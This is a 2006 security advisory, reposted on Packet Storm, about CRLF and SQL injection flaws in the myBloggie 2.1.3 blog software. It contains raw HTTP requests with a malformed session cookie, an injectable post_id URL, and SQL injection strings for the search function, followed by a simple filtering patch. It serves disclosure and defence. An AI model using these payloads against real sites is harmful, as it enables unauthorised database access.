exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HYSA-2006-008.txt

HYSA-2006-008.txt
Posted May 22, 2006
Authored by matrix killer | Site h4cky0u.org

myBloggie version 2.1.3 is susceptible to CRLF and SQL injection attacks.

tags | exploit, sql injection
SHA-256 | 450a90581b32d4d771b1b5c3e091773978e9e5146b232cb85a5acaf3d71f4d15

HYSA-2006-008.txt

Change Mirror Download
------------------------------------------------------
HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006


TITLE:
======

myBloggie 2.1.3 CRLF & SQL Injection


SEVERITY:
=========

Medium


SOFTWARE:
=========

myBloggie 2.1.3

http://mybloggie.mywebland.com/


INFO:
=====

myBloggie is considered one of the most simple, user-friendliest yet packed with features

Weblog system available to date.


DESCRIPTION:
============

--==CRLF injection==--

GET /mybloggie/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

GET /mybloggie/admin.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

GET /mybloggie/index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

--==SQL injection==--

http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='

Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:

1' having '1'='1'--

or

' or 'x'='x--

And a little patch from me:

if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){
echo "Invalid Characters";
exit;
}

if (isset($_GET['select'])) $select=$_GET['select'];
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];


$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword);
//....


VENDOR STATUS:
==============

Vendor was contacted but no response received till date.


CREDITS:
========

This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Search function sql injection was discovered by: MurderSkillz


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close